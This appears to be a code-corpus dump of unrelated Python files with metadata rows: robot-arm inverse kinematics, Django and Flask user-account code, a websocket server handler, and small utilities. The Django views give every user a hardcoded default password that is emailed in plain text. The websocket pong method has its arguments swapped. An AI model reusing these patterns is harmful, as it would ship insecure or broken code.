if not output_geometry:
raise QgsProcessingException(
self.tr('Error calculating extended line'))
feature.setGeometry(output_geometry)
return feature
| gpl-2.0 | 7,437,769,807,170,386,000 | 36.4375 | 100 | 0.535225 | false | 4.983361 | false | false | false |
studywolf/blog | InvKin/Arm.py | 1 | 7959 | '''
Copyright (C) 2013 Travis DeWolf
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import numpy as np
import scipy.optimize
class Arm3Link:
def __init__(self, q=None, q0=None, L=None):
"""Set up the basic parameters of the arm.
All lists are in order [shoulder, elbow, wrist].
q : np.array
the initial joint angles of the arm
q0 : np.array
the default (resting state) joint configuration
L : np.array
the arm segment lengths
"""
# initial joint angles
self.q = [.3, .3, 0] if q is None else q
# some default arm positions
self.q0 = np.array([np.pi/4, np.pi/4, np.pi/4]) if q0 is None else q0
# arm segment lengths
self.L = np.array([1, 1, 1]) if L is None else L
self.max_angles = [np.pi, np.pi, np.pi/4]
self.min_angles = [0, 0, -np.pi/4]
def get_xy(self, q=None):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
returns : list
the [x,y] position of the arm
"""
if q is None:
q = self.q
x = self.L[0]*np.cos(q[0]) + \
self.L[1]*np.cos(q[0]+q[1]) + \
self.L[2]*np.cos(np.sum(q))
y = self.L[0]*np.sin(q[0]) + \
self.L[1]*np.sin(q[0]+q[1]) + \
self.L[2]*np.sin(np.sum(q))
return [x, y]
def inv_kin(self, xy):
"""This is just a quick write up to find the inverse kinematics
for a 3-link arm, using the SciPy optimize package minimization
function.
Given an (x,y) position of the hand, return a set of joint angles (q)
using constraint based minimization, constraint is to match hand (x,y),
minimize the distance of each joint from it's default position (q0).
xy : tuple
the desired xy position of the arm
returns : list
the optimal [shoulder, elbow, wrist] angle configuration
"""
def distance_to_default(q, *args):
"""Objective function to minimize
Calculates the euclidean distance through joint space to the
default arm configuration. The weight list allows the penalty of
each joint being away from the resting position to be scaled
differently, such that the arm tries to stay closer to resting
state more for higher weighted joints than those with a lower
weight.
q : np.array
the list of current joint angles
returns : scalar
euclidean distance to the default arm position
"""
# weights found with trial and error,
# get some wrist bend, but not much
weight = [1, 1, 1.3]
return np.sqrt(np.sum([(qi - q0i)**2 * wi
for qi, q0i, wi in zip(q, self.q0, weight)]))
def x_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired x position
"""
x = (self.L[0]*np.cos(q[0]) + self.L[1]*np.cos(q[0]+q[1]) +
self.L[2]*np.cos(np.sum(q))) - xy[0]
return x
def y_constraint(q, xy):
"""Returns the corresponding hand xy coordinates for
a given set of joint angle values [shoulder, elbow, wrist],
and the above defined arm segment lengths, L
q : np.array
the list of current joint angles
xy : np.array
current xy position (not used)
returns : np.array
the difference between current and desired y position
"""
y = (self.L[0]*np.sin(q[0]) + self.L[1]*np.sin(q[0]+q[1]) +
self.L[2]*np.sin(np.sum(q))) - xy[1]
return y
def joint_limits_upper_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return self.max_angles - q
def joint_limits_lower_constraint(q, xy):
"""Used in the function minimization such that the output from
this function must be greater than 0 to be successfully passed.
q : np.array
the current joint angles
xy : np.array
current xy position (not used)
returns : np.array
all > 0 if constraint matched
"""
return q - self.min_angles
return scipy.optimize.fmin_slsqp(
func=distance_to_default,
x0=self.q,
eqcons=[x_constraint,
y_constraint],
# uncomment to add in min / max angles for the joints
# ieqcons=[joint_limits_upper_constraint,
# joint_limits_lower_constraint],
args=(xy,),
iprint=0) # iprint=0 suppresses output
def test():
# ###########Test it!##################
arm = Arm3Link()
# set of desired (x,y) hand positions
x = np.arange(-.75, .75, .05)
y = np.arange(.25, .75, .05)
# threshold for printing out information, to find trouble spots
thresh = .025
count = 0
total_error = 0
# test it across the range of specified x and y values
for xi in range(len(x)):
for yi in range(len(y)):
# test the inv_kin function on a range of different targets
xy = [x[xi], y[yi]]
# run the inv_kin function, get the optimal joint angles
q = arm.inv_kin(xy=xy)
# find the (x,y) position of the hand given these angles
actual_xy = arm.get_xy(q)
# calculate the root squared error
error = np.sqrt(np.sum((np.array(xy) - np.array(actual_xy))**2))
# total the error
total_error += np.nan_to_num(error)
# if the error was high, print out more information
if np.sum(error) > thresh:
print('-------------------------')
print('Initial joint angles', arm.q)
print('Final joint angles: ', q)
print('Desired hand position: ', xy)
print('Actual hand position: ', actual_xy)
print('Error: ', error)
print('-------------------------')
count += 1
print('\n---------Results---------')
print('Total number of trials: ', count)
print('Total error: ', total_error)
print('-------------------------')
if __name__ == '__main__':
test()
| gpl-3.0 | 4,691,724,446,632,460,000 | 34.373333 | 79 | 0.547305 | false | 4.128112 | false | false | false |
Mansilla1/Sistema-SEC | apps/usuarios/views.py | 1 | 14404 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Código desarrollado por Daniel Mansilla
from django.shortcuts import render, render_to_response, redirect
from django.views.generic import ListView, CreateView, DetailView, DeleteView, UpdateView, TemplateView
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest
from django.core.urlresolvers import reverse_lazy
from django.core import serializers
from django.contrib.auth.models import User
from django.contrib.auth import login, logout
from django.utils import timezone
from django.template import RequestContext
# import django_excel as excel
from django.contrib import messages
from django.core.mail import send_mail
from django.conf import settings
import openpyxl
from openpyxl import Workbook
from openpyxl.styles import Font
from io import BytesIO
from Proyecto.utilities import generate_pdf
from random import randrange, uniform
import random
import requests
import ast
from django.db.models import Count
# from django.utils import simplejson
# import simplejson
from .forms import *
from .models import *
def login_user(request):
template_name = 'login/login.html'
logout(request)
username = password = ''
request.session['token'] = None
if request.POST:
post_data = {'username': request.POST["username"],'password':request.POST["password"]}
response = requests.post('http://cubesoa.asuscomm.com:90/rest-auth/login/', data=post_data)
content = response.content
content = ast.literal_eval(content)
if "key" in content:
post_data2 = {'username': str(request.POST["username"])}
header = {'Content-Type':'application/json','Authorization':'Token ' + content['key']}
response2 = requests.get('http://cubesoa.asuscomm.com:90/rest-auth/user/',headers=header, data=post_data2)
content2 = response2.content
content2 = ast.literal_eval(content2)
request.session["pk"] = content2['pk']
request.session["first_name"] = content2['first_name']
request.session["last_name"] = content2['last_name']
request.session["email"] = content2['email']
request.session["token"] = content['key']
return HttpResponseRedirect(reverse_lazy('inicio'))
# elif
# return redirect('inicio')
return render(request, template_name, {})
# def index(request):
# # perfil_user = PerfilUsuario.objects.get(user__id=request.user.id)
# # usuarios = PerfilUsuario.objects.all().count()
# # contenidos = ProfeSesion.objects.filter(status=True).count()
# # preguntas = Pregunta.objects.filter(status=True).count()
# # evaluaciones = Evaluacion.objects.filter(disponible=True).count()
# # usuario_registrados = PerfilUsuario.objects.all().order_by('created_at')[:5].reverse()
# # ------------------------------------------
# # OBTENER RANKINGS
# # ------------------------------------------
# user_pregunta = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(preguntas=Count('pregunta')).order_by('-preguntas')[:5]
# user_evaluacion = User.objects.exclude(perfilusuario__tipo_usuario='Estudiante').annotate(evaluaciones=Count('evaluacion')).order_by('-evaluaciones')[:5]
# orden_preguntas = Pregunta.objects.all().order_by('-cant_usada')[:5]
# context = {
# 'user_pregunta': user_pregunta,
# 'user_evaluacion': user_evaluacion,
# 'orden_preguntas': orden_preguntas,
# # 'perfil_user': perfil_user,
# # 'usuarios': usuarios,
# # 'preguntas': preguntas,
# # 'contenidos': contenidos,
# # 'evaluaciones': evaluaciones,
# # 'usuario_registrados': usuario_registrados,
# }
# return render(request, 'index.html', context)
def usuarioList(request):
usuario = PerfilUsuario.objects.all()
context = {
'usuario': usuario,
}
return render(request, 'apps/usuarios/usuario_list.html', context)
def usuarioCreate(request):
if request.POST:
form = PerfilForm(request.POST)
form2 = RegistroForm(request.POST)
if form.is_valid() and form2.is_valid():
form2 = form2.save(commit=False)
form2.save()
form = form.save(commit=False)
form.user = form2
form.save()
#Obtener el nombre de usuario
user=form2.username
nombre = form.nombres + ' ' +form.apellido1 + ' ' +form.apellido2
contrasena = 'unab2020'
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'Hola %s!\nusuario: %s, password: %s' % (nombre, user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
context = {
'form': form,
'form2': form2,
}
return render(request, 'apps/usuarios/usuario_create.html', context)
def usuarioUpdate(request, usuario_id):
# usuario = User.objects.get(id=usuario_id)
# id_user = int(usuario.id)
perfil = PerfilUsuario.objects.get(user=usuario_id)
if request.method == 'GET':
# form = RegistroForm(instance=usuario)
form = PerfilForm(instance=perfil)
else:
# form = RegistroForm(request.POST, instance=usuario)
form = PerfilForm(request.POST, instance=perfil)
if form.is_valid():
form.save()
# form2 = form2.save(commit=False)
# form2.user = usuario
# form2.save()
return redirect('usuarios:listar')
context = {
'form': form,
# 'form2': form2,
'perfil': perfil,
}
return render(request, 'apps/usuarios/usuario_update.html', context)
# class UsuarioDetail(DetailView):
# model = PerfilUsuario
# template_name = 'apps/usuarios/usuario_detail.html'
# context_object_name = 'usuario'
# def get_context_data(self, **kwargs):
# context = super(UsuarioDetail, self).get_context_data(**kwargs)
# context['title'] = 'Detalle de usuario'
# return context
def usuarioDelete(request, usuario_id):
usuario = User.objects.get(id=usuario_id)
if request.method == 'POST':
usuario.delete()
return redirect('usuarios:listar')
return render(request, 'apps/usuarios/usuario_delete.html', {'usuario':usuario})
#Planillas excel
def get_planilla_usuario(request):
#generar excel
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Usuarios'
# ws.font = ws.font.copy(bold=True, italic=True)
# Cabeceras
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a6 = ws.cell(row=1, column=6, value='Usuario')
a7 = ws.cell(row=1, column=7, value='Tipo Usuario')
# a7 = ws.cell(row=1, column=7, value='¿Coordinador de asignatura? (si/no)')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
a6.font = Font(bold=True)
a7.font = Font(bold=True)
nombre_archivo = 'Planilla_usuarios.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
def upload(request):
if request.POST:
# iniciar excel
excel = request.FILES['archivo'].read() # capturar archivo
wb = openpyxl.load_workbook(filename=BytesIO(excel)) # iniciar archivo
hojas = wb.get_sheet_names() # capturar nombre de hojas del archivo
hoja = wb.get_sheet_by_name(hojas[0]) #utilizar la primera hoja del documento
total_filas = hoja.max_row # capturar valor maximo de filas a leer
total_columnas = hoja.max_column # capturar valor maximo de columnas
user_no_register = []
#loop de lectura y escritura
for i in range(2, total_filas+1):
form = PerfilForm() #formulario de perfil usuario
form2 = RegistroForm(request.POST or None) # formulario registro usuario
# form3 = ProfesorForm()
# form3_2 = CoordinadorForm()
# form4 = EstudianteForm()
#probar existencia de usuario
username = hoja.cell(row=i,column=6).value
print username
try:
usuario = User.objects.get(username=username)
usuario = usuario.username
print 'usuario ya existe'
user_no_register += [usuario]
except:
rut = hoja.cell(row=i,column=1).value
nombre = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
usuario = hoja.cell(row=i,column=6).value
tipo_usuario = hoja.cell(row=i,column=7).value
nombre = nombre.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
tipo_usuario = tipo_usuario.capitalize()
if tipo_usuario == 'Comité académico' or tipo_usuario == 'Comite académico' or tipo_usuario == 'Comité academico':
tipo_usuario = 'Comite academico'
print tipo_usuario
# numero_random = randrange(100,999)
# contrasena = "%s%s%s%s" % (nombre[0].capitalize(),numero_random, apellido[:2], numero_random)
contrasena = "unab2020"
# form2.set_password(self.cleaned_data["password1"])
# form2.set_password(self.cleaned_data["password2"])
form2 = form2.save(commit=False)
form2.username = usuario
# form2.first_name = nombre
# form2.last_name = apellido
# form2.email = correo
form2.password1 = contrasena
form2.password2 = contrasena
form2.save()
form = form.save(commit=False)
form.rut = rut
form.nombres = nombre
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.tipo_usuario = tipo_usuario
form.user = form2
form.save()
# if form.tipo_usuario == 'Docente':
# form3 = form3.save(commit=False)
# form3.usuario = form
# form3.save()
# # if coordinador=='si' or coordinador=='SI' or coordinador=='Si' or coordinador=='sI':
# # form3_2 = form3_2.save(commit=False)
# # form3_2.profesor = form
# # form3_2.save()
# elif form.tipo_usuario == 'Estudiante':
# form4 = form4.save(commit=False)
# form4.usuario = form
# form4.save()
#Obtener el nombre de usuario
user =form2.username
nombre = "%s %s %s" %(form.nombres, form.apellido1, form.apellido2)
correo = form.email
tipouser = form.tipo_usuario
subject = 'Bienvenido al Portal SEC!'
message = 'usuario: %s, password %s' % (user, contrasena)
send_mail(
subject,
message,
settings.EMAIL_HOST_USER,
[correo],
fail_silently=False,
)
print user_no_register
return redirect('usuarios:listar')
else:
form = PerfilForm()
form2 = RegistroForm()
# form3 = ProfesorForm()
# # form3_2 = CoordinadorForm()
# form4 = EstudianteForm()
context = {
'form': form,
'form2': form2,
# 'form3': form3,
# # 'form3_2': form3_2,
# 'form4': form4,
}
return render(request, 'apps/usuarios/usuario_upload.html', context)
# ESTUDIANTES
def estudiante_list(request):
estudiantes = Estudiante.objects.all()
return render(request, 'apps/usuarios/estudiantes_list.html', {'estudiantes': estudiantes})
def estudiante_create(request):
if request.POST:
form = EstudianteForm(request.POST)
if form.is_valid():
form.save()
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {'form': form}
return render(request, 'apps/usuarios/estudiante_create.html', context)
def upload_estudiante(request):
if request.POST:
# iniciar excel
excel = request.FILES['archivo'].read() # capturar archivo
wb = openpyxl.load_workbook(filename=BytesIO(excel)) # iniciar archivo
hojas = wb.get_sheet_names() # capturar nombre de hojas del archivo
hoja = wb.get_sheet_by_name(hojas[0]) #utilizar la primera hoja del documento
total_filas = hoja.max_row # capturar valor maximo de filas a leer
total_columnas = hoja.max_column # capturar valor maximo de columnas
user_no_register = []
#loop de lectura y escritura
for i in range(2, total_filas+1):
form = EstudianteForm() #formulario de perfil usuario
# probar existencia de estudiante
rut = hoja.cell(row=i,column=1).value
estudiante_no_register = []
try:
estudiante = Estudiante.objects.get(rut=rut)
print 'estudiante ya existe'
estudiante_no_register += [estudiante]
except:
rut = hoja.cell(row=i,column=1).value
nombres = hoja.cell(row=i,column=2).value
apellido1 = hoja.cell(row=i,column=3).value
apellido2 = hoja.cell(row=i,column=4).value
correo = hoja.cell(row=i,column=5).value
nombre2 = ''
nombre3 = ''
nombres = nombres.capitalize()
apellido1 = apellido1.capitalize()
apellido2 = apellido2.capitalize()
form = form.save(commit=False)
form.rut = rut
form.nombre1 = nombres
form.nombre2 = nombre2
form.nombre3 = nombre3
form.apellido1 = apellido1
form.apellido2 = apellido2
form.email = correo
form.save()
print estudiante_no_register
return redirect('usuarios:listar_estudiantes')
else:
form = EstudianteForm()
context = {
'form': form,
}
return render(request, 'apps/usuarios/estudiante_upload.html', context)
def get_planilla_estudiante(request):
#generar excel
wb = Workbook()
# ws = wb.create_sheet("Calificaciones",0)
ws = wb.active
ws.title = 'Estudiantes'
# ws.font = ws.font.copy(bold=True, italic=True)
# Cabeceras
a1 = ws.cell(row=1, column=1, value='RUN')
a2 = ws.cell(row=1, column=2, value='Nombres')
a3 = ws.cell(row=1, column=3, value='Apellido Paterno')
a4 = ws.cell(row=1, column=4, value='Apellido Materno')
a5 = ws.cell(row=1, column=5, value='Email')
a1.font = Font(bold=True)
a2.font = Font(bold=True)
a3.font = Font(bold=True)
a4.font = Font(bold=True)
a5.font = Font(bold=True)
nombre_archivo = 'Planilla_estudiantes.xlsx'
response = HttpResponse(content_type="application/ms-excel")
contenido = "attachment; filename={0}".format(nombre_archivo)
response["Content-Disposition"] = contenido
wb.save(response)
return response
# AJAX
class GetEstudiantes(TemplateView):
def get(self, request, *args, **kwargs):
estudiante = Estudiante.objects.all()
print estudiante
data = serializers.serialize('json', estudiante)
return HttpResponse(data, content_type="application/json") | apache-2.0 | 1,000,900,255,023,441,300 | 29.313684 | 156 | 0.682317 | false | 2.691215 | false | false | false |
svenstaro/python-web-boilerplate | boilerplateapp/models/user.py | 1 | 2930 | """Module containing the `User` model."""
import uuid
import secrets
import string
from datetime import datetime
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy_utils.models import Timestamp
from flask import current_app
from boilerplateapp.extensions import db, passlib
class User(db.Model, Timestamp):
"""User model."""
id = db.Column(UUID(as_uuid=True), primary_key=True, nullable=False, default=uuid.uuid4)
email = db.Column(db.String(120), unique=True, nullable=False, index=True)
password_hash = db.Column(db.String(120), nullable=False)
current_auth_token = db.Column(db.String(32), index=True)
last_action = db.Column(db.DateTime)
def __init__(self, email, password):
"""Construct a `User`.
Accepts an `email` and a `password`. The password is securely hashed
before being written to the database.
"""
self.email = email
self.set_password(password)
def __repr__(self):
"""Format a `User` object."""
return '<User {email}>'.format(email=self.email)
def set_password(self, new_password):
"""Hash a given `new_password` and write it into the `User.password_hash` attribute.
It does not add this change to the session not commit the transaction!
"""
self.password_hash = passlib.pwd_context.hash(new_password)
def verify_password(self, candidate_password):
"""Verify a given `candidate_password` against the password hash stored in the `User`.
Returns `True` if the password matches and `False` if it doesn't.
"""
return passlib.pwd_context.verify(candidate_password, self.password_hash)
def generate_auth_token(self):
"""Generate an auth token and save it to the `current_auth_token` column."""
alphabet = string.ascii_letters + string.digits
new_auth_token = ''.join(secrets.choice(alphabet) for i in range(32))
self.current_auth_token = new_auth_token
self.last_action = datetime.utcnow()
db.session.add(self)
db.session.commit()
return new_auth_token
@property
def has_valid_auth_token(self):
"""Return whether or not the user has a valid auth token."""
latest_valid_date = datetime.utcnow() - current_app.config['AUTH_TOKEN_TIMEOUT']
return (self.last_action and
self.last_action > latest_valid_date and
self.current_auth_token)
@staticmethod
def get_user_from_login_token(token):
"""Get a `User` from a login token.
A login token has this format:
<user uuid>:<auth token>
"""
user_id, auth_token = token.split(':')
user = db.session.query(User).get(user_id)
if user and user.current_auth_token:
if secrets.compare_digest(user.current_auth_token, auth_token):
return user
return None
| mit | 2,480,630,203,031,518,700 | 35.17284 | 94 | 0.646075 | false | 3.943472 | false | false | false |
fdslight/fdslight | pywind/web/handlers/websocket.py | 1 | 8933 | #!/usr/bin/env python3
import pywind as tcp_handler
import pywind.web.lib.websocket as websocket
import pywind.web.lib.httputils as httputils
import socket, time
class ws_listener(tcp_handler.tcp_handler):
def init_func(self, creator, listen, is_ipv6=False):
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
s = socket.socket(fa, socket.SOCK_STREAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.set_socket(s)
self.bind(listen)
return self.fileno
def after(self):
self.listen(10)
self.register(self.fileno)
self.add_evt_read(self.fileno)
def tcp_accept(self):
while 1:
try:
cs, caddr = self.accept()
except BlockingIOError:
break
self.ws_accept(cs,caddr)
''''''
def ws_accept(self,cs,caddr):
"""重写这个方法
:param cs:客户端套接字对象
:param caddr:客户端地址
:return:
"""
pass
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def ws_release(self):
"""重写这个方法
:return:
"""
class ws_handler(tcp_handler.tcp_handler):
__conn_timeout = 60
__caddr = None
__encoder = None
__decoder = None
__is_handshake = None
__LOOP_TIMEOUT = 20
__update_time = 0
# 自定义的握手响应头
__ext_handshake_resp_headers = None
__is_close = False
__is_sent_ping = False
def init_func(self, creator, cs, caddr):
self.__caddr = caddr
self.__decoder = websocket.decoder(server_side=True)
self.__encoder = websocket.encoder(server_side=True)
self.__is_handshake = False
self.__ext_handshake_resp_headers = []
self.__is_close = False
self.set_socket(cs)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
self.ws_init()
return self.fileno
def ws_init(self):
"""重写这个方法
:return:
"""
pass
@property
def caddr(self):
return self.__caddr
def response_error(self):
resp_sts = httputils.build_http1x_resp_header("400 Bad Request", [("Sec-WebSocket-Version", 13), ],
version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
self.delete_this_no_sent_data()
def __do_handshake(self, byte_data):
try:
sts = byte_data.decode("iso-8859-1")
except UnicodeDecodeError:
self.response_error()
return False
try:
rs = httputils.parse_htt1x_request_header(sts)
except:
self.response_error()
return False
req, headers = rs
dic = {}
for k, v in headers:
k = k.lower()
dic[k] = v
if "sec-websocket-key" not in dic: return False
ws_version = dic.get("sec-websocket-version", 0)
is_err = False
try:
ws_version = int(ws_version)
if ws_version != 13: is_err = True
except ValueError:
is_err = True
if is_err:
self.response_error()
return False
if not self.on_handshake(req, headers):
self.response_error()
return False
sec_ws_key = dic["sec-websocket-key"]
resp_sec_key = websocket.gen_handshake_key(sec_ws_key)
resp_headers = [("Upgrade", "websocket"), ("Connection", "Upgrade"), ("Sec-WebSocket-Accept", resp_sec_key)]
resp_headers += self.__ext_handshake_resp_headers
resp_sts = httputils.build_http1x_resp_header("101 Switching Protocols", resp_headers, version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
return True
def __handle_ping(self, message):
self.__send_pong(message)
def __handle_pong(self):
self.__is_sent_ping = False
self.__update_time = time.time()
def __handle_close(self):
if not self.__is_close:
self.ws_close()
return
self.delete_handler(self.fileno)
def __send_ping(self):
wrap_msg = self.__encoder.build_ping()
self.__is_sent_ping = True
self.__update_time = time.time()
self.writer.write(wrap_msg)
self.add_evt_write(self.fileno)
def __send_pong(self, message):
wrap_msg = self.__encoder.build_pong(message)
self.__update_time = time.time()
self.writer.write(self.fileno)
self.add_evt_write(wrap_msg)
def on_handshake(self, request, headers):
"""重写这个方法
:param request:
:param headers:
:return Boolean: False表示握手不允许,True表示握手允许
"""
return True
def set_handshake_resp_header(self, name, value):
"""设置额外的响应头
:param name:
:param value:
:return:
"""
self.__ext_handshake_resp_headers.append((name, value,))
def set_ws_timeout(self, timeout):
self.__conn_timeout = int(timeout)
if self.__conn_timeout < 1: raise ValueError("wrong timeout value")
def tcp_readable(self):
rdata = self.reader.read()
if not self.__is_handshake:
if not self.__do_handshake(rdata): return
self.__is_handshake = True
return
self.__decoder.input(rdata)
while self.__decoder.continue_parse():
self.__decoder.parse()
if not self.__decoder.can_read_data(): continue
data = self.__decoder.get_data()
self.__handle_readable(data, self.__decoder.fin, self.__decoder.rsv, self.__decoder.opcode,
self.__decoder.frame_ok())
if self.__decoder.frame_ok(): self.__decoder.reset()
self.__update_time = time.time()
return
def __handle_readable(self, message, fin, rsv, opcode, frame_finish):
"""
:param message:
:param fin:
:param rsv:
:param opcode:
:param frame_finish:
:return:
"""
if opcode == websocket.OP_CLOSE:
self.__handle_close()
return
if opcode == websocket.OP_PING:
self.__handle_ping(message)
return
if opcode == websocket.OP_PONG:
self.__handle_pong()
return
if not message: return
if message: self.ws_readable(message, fin, rsv, opcode, frame_finish)
def tcp_writable(self):
self.remove_evt_write(self.fileno)
def tcp_error(self):
self.delete_handler(self.fileno)
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def tcp_timeout(self):
if not self.__is_handshake:
self.delete_handler(self.fileno)
return
t = time.time()
if t - self.__update_time >= self.__conn_timeout:
if self.__is_close or self.__is_sent_ping:
self.delete_handler(self.fileno)
return
self.__send_ping()
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
def sendmsg(self, msg, fin, rsv, opcode):
"""发送websocket消息
:param msg:
:return:
"""
if opcode in (0x8, 0x9, 0xa,): raise ValueError("ping,pong,close frame cannot be sent by this function")
if self.__is_close: raise ValueError("the connection is closed,you should not send data")
self.__update_time = time.time()
wrap_msg = self.__encoder.build_frame(msg, fin, rsv, opcode)
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
def ws_readable(self, message, fin, rsv, opcode, frame_finish):
"""重写这个方法
:param message:
:param fin:
:param rsv:
:param opcode:
:param is_finish:
:return:
"""
pass
def ws_close(self, code=None):
"""关闭ws连接
:return:
"""
if not code:
code = ""
else:
code = str(code)
wrap_msg = self.__encoder.build_close(code.encode("iso-8859-1"))
self.__is_close = True
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
self.__update_time = time.time()
self.delete_this_no_sent_data()
def ws_release(self):
"""重写这个方法
:return:
"""
pass | bsd-2-clause | -8,273,594,278,908,964,000 | 25.149254 | 116 | 0.545953 | false | 3.66946 | false | false | false |
broomyocymru/ditto | ditto/core/cache.py | 1 | 1389 | import glob
import os
import shutil
import uuid
from os.path import expanduser
import requests
from ditto.core import logger
def setup():
global session_uuid
session_uuid = str(uuid.uuid1())
def cleanup():
shutil.rmtree(get_cache_dir(), True)
def get_session_uuid():
return session_uuid
def get_file(file_path):
if file_path.startswith('http'):
fname = file_path.split('/')[-1]
if not os.path.exists(get_cache_dir()):
os.makedirs(get_cache_dir())
local_path = os.path.abspath(get_cache_dir() + '/' + fname)
r = requests.get(file_path, stream=True)
if r.status_code == 200:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
del r
else:
logger.error("Download failed (" + file_path + ")")
file_path = local_path
else:
file_paths = glob.glob(file_path)
if len(file_paths) > 1:
logger.warn("More than 1 file found, taking first")
if len(file_paths) == 0:
logger.error("File not found (" + file_path + ")")
file_path = os.path.abspath(file_paths[0])
return file_path
def get_cache_dir():
cache_dir = os.path.abspath(os.path.join(expanduser("~"), ".ditto_cache"))
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
return cache_dir | mit | -2,744,009,419,647,377,400 | 21.419355 | 78 | 0.587473 | false | 3.481203 | false | false | false |
jemofthewest/GalaxyMage | src/Sound.py | 1 | 2427 | # Copyright (C) 2005 Colin McMillen <[email protected]>
#
# This file is part of GalaxyMage.
#
# GalaxyMage is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# GalaxyMage is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GalaxyMage; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
# You may import this module only after the pygame mixer module has
# been initialized.
import Resources
import pygame
_quiet = False
_mixerInit = pygame.mixer.get_init() != None
if _mixerInit:
_cursorChannel = pygame.mixer.Channel(0)
_actionChannel = pygame.mixer.Channel(1)
else:
_quiet = True
_cursorChannel = None
_actionChannel = None
def _play(channel, sound):
if not _mixerInit:
return
if not _quiet and sound != None:
channel.play(sound)
def setQuiet(quiet):
global _quiet
if not _mixerInit:
return
_quiet = quiet
if _quiet:
pygame.mixer.pause()
pygame.mixer.music.pause()
else:
pygame.mixer.unpause()
pygame.mixer.music.unpause()
def toggleQuiet():
setQuiet(not _quiet)
def playMusic(musicName):
"""Changes background music."""
if not _mixerInit:
return
if not _quiet:
Resources.music(musicName)
def playTune(tuneName):
"""Plays a short tune. Returns whether it was actually played."""
if _mixerInit and not _quiet:
Resources.music(tuneName, loop=False)
return True
else:
return False
def cursorClick():
s = Resources.sound("cursor-click")
_play(_cursorChannel, s)
def cursorCancel():
s = Resources.sound("cursor-cancel")
_play(_cursorChannel, s)
def cursorMove():
s = Resources.sound("cursor-move")
_play(_cursorChannel, s)
def cursorInvalid():
s = Resources.sound("cursor-invalid")
_play(_cursorChannel, s)
def action(sound):
s = Resources.sound(sound)
_play(_actionChannel, s)
| gpl-2.0 | -3,338,352,428,866,749,400 | 23.765306 | 70 | 0.679852 | false | 3.574374 | false | false | false |
JohanComparat/pySU | galaxy/python/lineListAir.py | 1 | 4082 | """
Script loading the atomic properties from the pyNEB package.
Mostly line transitions.
Input to the line fitting procedures
"""
import numpy as n
from scipy.interpolate import interp1d
import pyneb as pn
# Conversion from Morton (1991, ApJS, 77, 119) wavelength in Angstrom
# SDSS spectra are in the vacuum, therefore the ref wavelengths of the lines must be in the vacuum.
AIR = lambda VAC : VAC / (1.0 + 2.735182e-4 + 131.4182 / VAC**2 + 2.76249e8 / VAC**4)
vacs=n.arange(1000,12000,0.01)
airs=AIR(vacs)
VAC = interp1d(airs,vacs)
# Wavelengths from pyNeb Atoms are in A in vacuum like the SDSS spectra. No need to convert.
C3 = pn.Atom('C', 3)
